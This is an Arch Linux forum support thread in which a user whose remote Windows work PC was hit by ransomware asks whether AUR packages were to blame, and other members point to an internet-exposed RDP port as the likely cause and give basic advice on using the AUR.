Ransomware Arch - Windows (Solved)

zalves2000 · 2024-07-10 23:23:27

Hello, today I want to access on of my PCs while away. I installed remmina on my Arch linux machine, it required freerdp to use remote desktop, so I installed that. all using yay. Also installed wireguird from the link in the AUR site. All that was during lunch time. At the end of the day my remote PC had been infected with ransomware. It's a company computer. No other computer on the network has been infected. Could it be related to anything form Arch? It was only after accessing it through Arch that this happened. I had a remote desktop port that I opened on the days I use it. Had a few passwords stored on my Chrome profile, should I consider those compromised?

Last edited by zalves2000 (2024-07-11 23:32:34)

seth · 2024-07-11 06:43:12

What is "ransomware" and what are the symptoms of the infection?

after accessing it through Arch

I guess that along the subject line implies there's other means to access it, ie. a parallel windows an that's probably also what's infected?

Also installed wireguird from the link in the AUR site.

You did what?
https://archlinux.org/packages/extra/x8 … ard-tools/

The AUR is unvetted, it's possible to pick up malware from there but if your windows is infected with ransomware™ it's *abysmally* more likely that you got that using windows.
A compromised system is generally not trustworthy and unless your passwords are stored encrypted and you didn't decrypt the vault after the malware entered the system, you've to consider being compromised because you don't know that they're not.

Edit: please list all the AUR packages you installed

Last edited by seth (2024-07-11 06:43:42)

zalves2000 · 2024-07-11 07:39:07

At 2pm I had to remote login. So I installed Remmina using yay -S remmina. After that I noticed I had to install freerdp. So I did that using git clone for this https://aur.archlinux.org/packages/freerdp-git when I tried to makepkg it said it needed dependencies, so I did makepkg -s That was it.

I also installed wireguard-tools using yay and git clone for https://aur.archlinux.org/packages/wireguird as per Arch wiki instructions.

Did I do anything wrong?

I noticed around 10pm that it was hacked. The PC was powered on and not used for a week, only after accessing it remotely it got "kidnapped" the data in it is not of much concern, but if it spread to other machines on the network it's very bad! It was powered off immediately

seth · 2024-07-11 07:41:17

You've completely failed to detail the "hacked by ransomware" part - is windows affected? Did you notice that the first time using windows after a week?

Nikolai5 · 2024-07-11 09:08:12

I'm sorry to chip in with little value here Seth, but I just have to ask @zalves2000 why you seem to go straight to the AUR when there is a perfectly functional package in the main repos (extra)?

All the packages you've mentioned are in the main repos, aside from that as Seth said, other than our own interpretation of what we know ransomware to be, we don't know anything about your symptoms or set up to be able to answer your questions.

If the computer was turned off, how do you know the virus / malware was not already there and booting it up simply ran the malware's startup scripts? When you notice it vs when it was infected are two different things.

zalves2000 · 2024-07-11 09:12:07

My windows installation has been working fine for that past week that has been untouched. Only after accessing it through the described methods it became affected by ransomeware. As soon O noticed a ransomware attack on the Windows machine I turned it off immediately, to help prevent propagation to the rest of the network. Wireguard doesn't appear to be the culprit, as it was the RDP that had abnormal high traffic. It's just a lot of coincidence that a system which is unaffected for a very long time becomes infected shortly after be accessed via my linux instalation.

Nikolai5 · 2024-07-11 09:18:18

It's unlikely there is ransomware baked into freerdp or remmina, they're used by a lot of people to access Windows systems new and old. That's not to say there isn't though, especially through the AUR, it's just unlikely.

We still have no idea what your ransomware looks like, can you describe it to us? What exactly are you wanting us to help you with?

If you're asking for recommendations on what software you should have used, I'd just say don't use yay, use pacman. Install remmina and dependencies from the main repos and enjoy. If you're asking if your Linux system is compromised, we have no way of knowing at present.

Whoracle · 2024-07-11 09:18:19

On phone, so short: wireguird is not a typo, it's a gui for wireguard mgmt. Just to clear up some confusion maybe.

Awebb · 2024-07-11 09:32:32

A WAN exposed RDP port is a huge risk. There is one critical vulnerability every year and a medium to high one every other month. Even if your system has been patched, the risk is just too high. Your scenario is inconclusive. Did you open an RDP port or did you use a wireguard tunnel?

If you suspect whatever infection you're not detailing to come from your Arch system, at least list all AUR (and otherwise foreign) packages you're using.

zalves2000 · 2024-07-11 10:36:48

Ransomware encrypts all your files, a pop up appears everywhere saying you have to pay a certain amount of bitcoin to get the keys for decryption. It's nasty!

I was sorting out ways to access my computer on the other side. Firstly RDP and secondly Wireguard VPN.

It's true the RDP port was open, but how easy is it to access without proper credentials? Those were given when accessing yesterday, could there be someone just listening to the port and intercept packets to get credentials?

From AUR I installed: freerdp and wireguird and wireguard-tools. For freerdp I used -s when makepkg to get the missing dependencies. That was it.

Anyway I can get a list of what was installed?

I'm no blaming Arch. but it seems that AUR isn't some place where everything can be trusted. When I use it I try to go for things that have higher popularity and are commonly used. but it appears I should always try pacman first.

Awebb · 2024-07-11 12:36:29

"pacman -Qm" shows all foreign packages that do not come from a repository. You should also list all non-standard repositories you're using from pacman.conf.

seth · 2024-07-11 12:51:09

It's true the RDP port was open, but how easy is it to access without proper credentials?

A WAN facing RDP port is game over, there's no malware in any AUR packages necessary. The attack is super-common.
https://www.syspeace.com/ransomware-attacks-via-rdp/
https://ransomware.org/blog/rdp-ransomw … d-to-know/

We can still look at the list but that's like saying it was maybe the jewish space lasers that blinded you while purely coincidentally you were poking your eyes with a red hot iron…

zalves2000 · 2024-07-11 13:32:36

From these links it appears it may have been the case. Malware might have been there waiting for an opening.

seth wrote:

It's true the RDP port was open, but how easy is it to access without proper credentials?
A WAN facing RDP port is game over, there's no malware in any AUR packages necessary. The attack is super-common.
https://www.syspeace.com/ransomware-attacks-via-rdp/
https://ransomware.org/blog/rdp-ransomw … d-to-know/

Now I suppose it's damage control in terms of stopping spreading to the rest of the network and compromised credentials. None of the contents is sensitive information. It's been a few hours and nothing else changed. I did change passwords of important accounts and enabled 2fa on some that didn't have.
Thank you for your replies. Let's hope there is no further damage.

Anyway here is the list of dependencies:
airspyhf-git r124.39f06a4-1
airspyhf-git-debug r124.39f06a4-1
arduino-ide-bin 2.3.2-2
autojump 22.5.3-9
brave-bin 1:1.67.123-1
dxvk-bin 2.3.1-1
esp-idf 5.2.2-1
freerdp-git 3.6.3.r17.g3838b18b5-1
github-desktop-bin 3.3.18_linux1-1
google-chrome 126.0.6478.126-1
libsdrplay 3.15.2-2
libsdrplay-debug 3.15.2-2
nordic-darker-standard-buttons-theme 2.2.0-1
nordic-darker-theme 2.2.0-1
nordic-kde-git 2.2.0.r112.g564f54c-1
nordic-theme 2.2.0-1
ocs-url 3.1.0-7
parsec-bin 150_86e-6
plymouth-git 24.004.60.r48.g3ce6441a-1
rtl-sdr-blog-git 1:v1.3.6.r0.g240bd0e-1
sddm-nordic-theme-git 2.2.0.r111.g8f7bcdb-1
sdrpp-git 1.0.4.r712.36492e79-1
sdrpp-git-debug 1.0.4.r712.36492e79-1
snapper-gui-git 0.1+8.r132.20220626.1915750-1
ttf-meslo 1.2.1-3
wireguird 1.1.0-1
wireguird-debug 1.1.0-1
yay 12.3.5-1
yay-debug 12.3.5-1
zoom 6.1.0-1

Nikolai5 · 2024-07-11 13:39:47

When I had a web server with Digital Ocean I ran fail2ban on it that banned Ips that failed to connect. Over the course of a few years nobody ever got in, but I had hundreds of connection attempts every single day from people trying to break into my server that hosted nothing of any interest to anyone.

People / bots are indeed constantly probing for weakness.

zalves2000 · 2024-07-11 14:52:14

Lesson learned, never again a port open for RDP. Policy will be changed. Praying so that no further damage comes to be. Can I trust my Arch installation, should I do a fresh install?

c00ter · 2024-07-11 15:15:19

zalves2000 wrote:

Can I trust my Arch installation, should I do a fresh install?

The question might be better posed, "Can I trust *anything* (especially Windows) on my computer?"

seth · 2024-07-11 18:48:14

Is arch on the system that got compromised by the ransomware or did you use some archlinux system to access a different system (which got ultimately infected) via RDP?

A compromised system is principally not trustworthy. If the ransomware just encrypted the windows partitions w/ bitlocker and apparently ignored the linux installation, there's a good chance it didn't even "see" them, but the problem is *you don't know*
It could even have manipulated the ESP.

zalves2000 · 2024-07-11 19:27:22

I used a different archlinux system, on my laptop to access a different system, a windows workstation (that got infected) in a different location. I haven't been to the office yet to see exactly what happened. When I logged in remotely I say the ransomware warning and immediately shut down the windows workstation. All drives will be formated once I get there. No other system has been affected on the network of the Windows machine, so far. I've received a few e-mails during the day from facebook with the code for password reset That is what happened so far. All ports are closed on the router.

seth · 2024-07-11 19:43:14

What realistically has happened is that you opened RDP to the WAN, the system got taken over by the ransomware through that and by your own account *before* your remote RDP access attempt.
Your linux installation has never been part of that equation except that you randomly used it when learning about the condition of the windows system and therefore there's no reason to assume that the arch system is compromised in any way, shape or form.
(There're reverse RDP attacks and that's how a bunch of these assholes got owned when attacking the wrong system, but that level of sophistication is unlikely to be expected from some ransomware that was likely clicked together)

zalves2000 · 2024-07-11 20:32:38

I did connect to it around 2pm and it was fine, only later that day around 20pm when I logged in again, the infection manifested itself. That is what I found to be strange. The port had been open by a few days before that without problems. Anyway, no more RDP open for the outside. A reverse RDP attack would be something I'd be happy to do to those assholes, but as you say, if I can be a victim, I'm also very far off from being able to pull it off, and probably be victim of something in the process. I really love Arch since I gave it a try. I wanted a linux distro for my old macbook laptop for HAM radio and some microcontroller projects. When you're learing, mistakes are made, some can be expensive, internet is a jungle...

seth · 2024-07-11 21:00:42

Another thing you hopefully learned is to be careful w/ the AUR.
https://aur.archlinux.org/cgit/aur.git/ … reerdp-git looks legit and is maintained by a very active AUR user, but keep in mind that the AUR is unvetted, so limit its usage to the necessary and pay attention to the buillds. It's an assistance fro you to build things, not an extended repository.
One of the biggest issues w/ pacman wrapping aur helpers like yay is that they blur those lines

Please always remember to mark resolved threads by editing your initial posts subject - so others will know that there's no task left, but maybe a solution to find.
Thanks.

Arch Linux

#1 2024-07-10 23:23:27

Ransomware Arch - Windows (Solved)

#2 2024-07-11 06:43:12

Re: Ransomware Arch - Windows (Solved)

#3 2024-07-11 07:39:07

Re: Ransomware Arch - Windows (Solved)

#4 2024-07-11 07:41:17

Re: Ransomware Arch - Windows (Solved)

#5 2024-07-11 09:08:12

Re: Ransomware Arch - Windows (Solved)

#6 2024-07-11 09:12:07

Re: Ransomware Arch - Windows (Solved)

#7 2024-07-11 09:18:18

Re: Ransomware Arch - Windows (Solved)

#8 2024-07-11 09:18:19

Re: Ransomware Arch - Windows (Solved)

#9 2024-07-11 09:32:32

Re: Ransomware Arch - Windows (Solved)

#10 2024-07-11 10:36:48

Re: Ransomware Arch - Windows (Solved)

#11 2024-07-11 12:36:29

Re: Ransomware Arch - Windows (Solved)

#12 2024-07-11 12:51:09

Re: Ransomware Arch - Windows (Solved)

#13 2024-07-11 13:32:36

Re: Ransomware Arch - Windows (Solved)

#14 2024-07-11 13:39:47

Re: Ransomware Arch - Windows (Solved)

#15 2024-07-11 14:52:14

Re: Ransomware Arch - Windows (Solved)

#16 2024-07-11 15:15:19

Re: Ransomware Arch - Windows (Solved)

#17 2024-07-11 18:48:14

Re: Ransomware Arch - Windows (Solved)

#18 2024-07-11 19:27:22

Re: Ransomware Arch - Windows (Solved)

#19 2024-07-11 19:43:14

Re: Ransomware Arch - Windows (Solved)

#20 2024-07-11 20:32:38

Re: Ransomware Arch - Windows (Solved)

#21 2024-07-11 21:00:42

Re: Ransomware Arch - Windows (Solved)

Board footer